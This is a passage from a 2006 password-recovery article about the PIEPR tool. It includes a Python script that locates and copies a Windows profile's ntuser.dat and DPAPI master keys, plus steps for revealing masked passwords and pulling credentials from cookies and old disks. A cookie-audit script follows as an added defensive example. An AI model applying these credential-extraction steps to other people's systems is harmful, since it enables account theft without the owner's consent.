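GUID_RE = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.IGNORECASE)
PROTECT_SUBDIR = ("Application Data", "Microsoft", "Protect")


def find_dpapi_material(profile_dir):
    """Return {'ntuser': path or None, 'masterkeys': {sid: [master key file paths]}}."""
    result = {"ntuser": None, "masterkeys": {}}
    ntuser = os.path.join(profile_dir, "ntuser.dat")
    if os.path.isfile(ntuser):
        result["ntuser"] = ntuser
    protect = os.path.join(profile_dir, *PROTECT_SUBDIR)
    if os.path.isdir(protect):
        for name in sorted(os.listdir(protect)):
            sid_dir = os.path.join(protect, name)
            if SID_RE.match(name) and os.path.isdir(sid_dir):
                # GUID-named files are master keys; "Preferred" and others are skipped
                keys = sorted(os.path.join(sid_dir, f) for f in os.listdir(sid_dir) if GUID_RE.match(f))
                result["masterkeys"][name] = keys
    return result


def stage_for_piepr(profile_dir, dest=None):
    """Copy ntuser.dat and each SID folder in full into one staging folder.
    Returns a list of (kind, destination path) pairs in copy order."""
    material = find_dpapi_material(profile_dir)
    dest = dest or tempfile.mkdtemp(prefix="staging_")
    copied = []
    if material["ntuser"]:
        target = os.path.join(dest, "ntuser.dat")
        shutil.copy2(material["ntuser"], target)
        copied.append(("ntuser", target))
    protect = os.path.join(profile_dir, *PROTECT_SUBDIR)
    for sid in material["masterkeys"]:
        target = os.path.join(dest, sid)
        shutil.copytree(os.path.join(protect, sid), target)   # whole folder, all keys
        copied.append(("masterkeys", target))
    return copied


DEMO_SID = "S-1-5-21-1587165142-6173081522-185545743-1003"   # SID from the article's example path


def build_demo_profile():
    """Constructed sample profile (empty placeholder files, no real user data)."""
    root = tempfile.mkdtemp(prefix="profile_")
    keydir = os.path.join(root, *PROTECT_SUBDIR, DEMO_SID)
    os.makedirs(keydir)
    with open(os.path.join(root, "ntuser.dat"), "wb"):
        pass
    for fname in ("5b4f2c0e-1111-4a2b-9c3d-000000000001", "Preferred"):   # invented GUID
        with open(os.path.join(keydir, fname), "wb"):
            pass
    return root


if __name__ == "__main__":
    profile = build_demo_profile()
    print(find_dpapi_material(profile))
    for kind, path in stage_for_piepr(profile):
        print(kind, "->", path)
```

Point the script at a real profile copied off an unbootable disk, and the staging folder is what the manual mode asks for; the user's logon password is the only input it cannot supply.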

Content Advisor
The Content Advisor password, as already said, is not kept as plain text; instead, it is stored as a hash. In the Content Advisor password management dialog, it is enough to just delete (you can restore the deleted password at any time later) or change this hash to unlock sites locked with Content Advisor. PIEPR will also display your password hint if there is one.

Asterisks passwords
PIEPR's fourth operating mode allows recovering Internet Explorer passwords hidden behind asterisks. To recover such a password, simply drag the magnifier to the window with a **** password. This tool allows recovering passwords for other programs that use IE Frames as well; e.g., Windows Explorer, some IE-based browsers, etc.

We have reviewed the basic Internet Explorer password recovery modes. There are also a number of additional features for viewing and editing cookies, cache, visited pages history, etc. We are not going to cover them in detail; instead, we are going to look at a few password recovery examples done with PIEPR.



5. Three Real-Life Examples
5.1. Example 1: Recovering current user's FTP password
When opening an FTP site, Internet Explorer pops up the log on dialog (fig.5 http://www.passcape.com/images/ie05.png).

If you have opened this site and set the 'Save password' option in the authentication dialog, the password must be saved in Protected Storage, so recovering it is a pretty trivial job. Select the automatic operating mode in PIEPR and then click 'Next'. In the dialog with decrypted passwords that appears, locate our resource (the site name must appear in the Resource Name column.)

As we see, the decryption of the current user's password should not cause any special difficulties. If the password is not found for some reason, don't forget to check IE's AutoComplete settings. Possibly, you have simply not set the program to save passwords.



5.2. Example 2: Recovering Web site passwords when the operating system is unbootable
This is a typical, but not fatal situation. The necessity to recover Internet Explorer passwords after unsuccessful Windows reinstallation occurs just as often.

In either case, we will have user's old profile with all files within it. This set is normally enough to get the job done. In the case with the reinstallation, Windows providently saves the old profile under a different name. For example, if your account name was John, after renaming it may look like John.WORK-72C39A18.

The first and foremost thing you must do is to gain access to the files in the old profile. There are two ways of doing this:
- Install a new operating system on a different hard drive; e.g., Windows XP, and hook the old hard drive to it.
- Create a Windows NT boot disk. There are many different utilities for creating boot disks and USB flash disks available online. For instance, you can use WinPE or BartPE. Or a different one. If your old profile was stored on an NTFS part of your hard drive, the boot disk will have to support NTFS.

Let's take the first route. Once we gain access to the old profile, we will need to let the system show hidden and system files. Otherwise, the files we need will be invisible. Open Control Panel, then click on Folder Options, and then select the View tab. On this tab, find the option 'Show hidden files and folders' and select it. Clear the option 'Hide protected operating system files'. When the necessary passwords are recovered, it's better to reset these options to the way they were set before.

Open the program's wizard in the manual mode and enter the path to the old profile's registry file. In our case, that is C:\Documents And Settings\John.WORK-72C39A18\ntuser.dat, where John.WORK-72C39A18 is the old account name. Click 'Next'.

This data should normally be sufficient for recovering Internet Explorer passwords. However, if there is at least a single encrypted FTP password, the program will request additional data, without which it will not be able to recover such types of passwords:
- User's password
- User's Master Key
- User's SID.
Normally, the program finds the last two items in user's profile and fills that data automatically. However, if that didn't happen, you can do that by hand: copy ntuser.dat and the folder with the Master Key to a separate folder. It is important to copy the entire folder, for it may contain several keys, and the program will select the right one automatically. Then enter path to file ntuser.dat that you have copied to another folder.

That's it. Now we need to enter the old account password, and the recovery will be completed. If you don't need the FTP passwords, you can skip the user's password, Master Key, and SID entry dialog.



5.3. Example 3: Recovering uncommonly stored passwords
When we open a certain website in the browser, the authentication dialog appears. However, PIEPR fails to recover its password in either automatic or manual mode. The 'Save password' option in Internet Explorer is enabled. We will need to recover this password.

Indeed, some websites don't let the browser save passwords in the auto-complete passwords list. Often, such websites are written in Java or use alternative password storage methods; e.g., they store passwords in cookies. A cookie is a small bit of text that accompanies requests and pages as they go between the Web server and the browser. The cookie contains information the Web application can read whenever the user visits the site. Cookies provide a useful means for Web applications to store user-specific information. For example, when a user visits your site, you can use cookies to store user preferences or other information. When the user visits your Web site another time, the application can retrieve the information it stored earlier. Cookies are used for all sorts of purposes, all relating to helping the Web site remember you. In essence, cookies help Web sites store information about visitors. A cookie also acts as a kind of calling card, presenting pertinent identification that helps an application know how to proceed. But cookies are often criticized for weak security and inaccurate user identification.

If the password field is filled with asterisks, the solution is clear: select the ASTERISKS PASSWORDS operating mode and then open the magic magnifier dialog. Then simply drag the magnifier to the Internet Explorer window (fig.6 http://www.passcape.com/images/ie06.png).

The password (or passwords, if the Internet Explorer window has several fields with asterisks) will appear in the PIEPR window (fig.7 http://www.passcape.com/images/ie07.png).

But it's not always that simple. The password field may be empty, or it may genuinely contain ***** as its value. In this case, as you have guessed by now, the ASTERISKS PASSWORDS tool will be useless.

We can assume that the password is stored in a cookie. Let's try to locate it. Choose the IE Cookie Explorer tool (fig.8 http://www.passcape.com/images/ie08.png).

The dialog that appears will list the websites that store cookies on your computer. Click on the URL column header to sort the website list alphabetically. This will help us find the right website more easily. Go through the list of websites and select the one we need. The list below will display the decrypted cookies for this website (fig.9 http://www.passcape.com/images/ie09.png).

As the figure shows, in our case the login and password are not encrypted and are stored as plain text.

Cookies are often encrypted. In that case, you are unlikely to succeed in recovering the password. The only thing you can try in order to regain the old account is to create a new account. Then you will be able to open the old cookies in a text editor and replace them with the new ones. However, this is only for when the worst comes to the worst; it is not recommended for normal use.

Also, don't forget that almost all pages and forms with passwords have a 'Forgot password' button.
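The weak pattern shown in this example, a site keeping the login and password in clear text inside cookies, is something the site's own operators can check for on the server side. The following Python script is an added example and is not part of the original article or of PIEPR: it parses constructed Set-Cookie headers, flags cookies whose names suggest they hold credentials rather than an opaque session identifier, and reports cookies that lack the Secure and HttpOnly attributes. The sample headers and the credential-name heuristic are assumptions made for this example.

```python
"""Audit Set-Cookie headers for credentials stored in clear text and for
missing transport and script protections. Added example; sample data is constructed."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Union

# Heuristic (an assumption for this example): cookie names that usually hold
# credentials rather than an opaque session identifier.
CREDENTIAL_NAME = re.compile(r"pass(word|wd)?|pwd|secret|login|user(name)?", re.I)


@dataclass
class Cookie:
    name: str
    value: str
    # attribute name (lower-case) -> value, or True for flag attributes
    attrs: Dict[str, Union[str, bool]] = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value into name, value and attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, Union[str, bool]] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        # Flag attributes such as Secure and HttpOnly carry no value.
        attrs[key.strip().lower()] = val.strip() if val else True
    return Cookie(name.strip(), value.strip(), attrs)


def audit_cookie(cookie: Cookie) -> List[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    if CREDENTIAL_NAME.search(cookie.name):
        findings.append(
            "credential-like name: value is stored on the client's disk "
            "in clear text and resent on every request"
        )
    if "secure" not in cookie.attrs:
        findings.append("missing Secure: cookie may be sent over plain HTTP")
    if "httponly" not in cookie.attrs:
        findings.append("missing HttpOnly: cookie is readable by page scripts")
    return findings


def audit_headers(headers: List[str]) -> Dict[str, List[str]]:
    """Audit several Set-Cookie headers, keyed by cookie name."""
    return {c.name: audit_cookie(c) for c in map(parse_set_cookie, headers)}


# Constructed sample headers: the first two reproduce the weak pattern from the
# article (login and password kept in cookies); the third is a safer design
# that stores only an opaque session identifier with protections enabled.
SAMPLE_HEADERS = [
    "login=jsmith; Path=/",
    "password=Secret123; Path=/",
    "SESSIONID=3f9a1c7e5d2b; Path=/; Secure; HttpOnly; SameSite=Strict",
]

if __name__ == "__main__":
    for cookie_name, findings in audit_headers(SAMPLE_HEADERS).items():
        status = "; ".join(findings) if findings else "ok"
        print(f"{cookie_name}: {status}")
```

Run against real responses, the same audit can be fed the Set-Cookie headers captured from a test client; the point is that a session cookie should carry an opaque identifier with Secure and HttpOnly set, so that nothing recoverable as a password ever reaches the browser's cookie store.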




Conclusion
As this article shows, recovering Internet Explorer passwords is a fairly simple job that does not require any special knowledge or skills. However, despite the seeming simplicity, the password encryption schemes and algorithms are very well thought through and just as well implemented. Although the Protected Storage concept is over 10 years old, don't forget that it has earned the highest recommendations of experts and has been implemented through three generations of this popular browser.

With the release of the next, 7th version of IE, Microsoft is preparing fundamentally new schemes for protecting our private data, which use improved encryption algorithms and eliminate the shortcomings of Protected Storage.

In particular, analysis of the preliminary beta versions of Internet Explorer 7 has revealed that autoform password encryption keys are no longer stored along with the data. They are not stored, period! This is a small piece of know-how that will be appreciated at its true worth by both professionals and end users, who will ultimately benefit from it.

But the main thing is that the release of the new concept will eliminate the major drawback of Protected Storage, which is the possibility of recovering passwords without knowing any additional information. In other words, it was enough for a potential attacker to gain physical access to the contents of a hard drive in order to steal or damage passwords and the user's other private data. With the release of Internet Explorer 7, the situation will change somewhat.

Meanwhile, we can only wait impatiently for the advent of Windows Vista and IE 7 to take a closer look at the new encryption mechanisms used in the next generation of this popular browser.



This document may be freely distributed or reproduced provided that the
reference to the original article is placed on each copy of this document.
(c) 2006 Passcape Software. All rights reserved.
http://www.passcape.com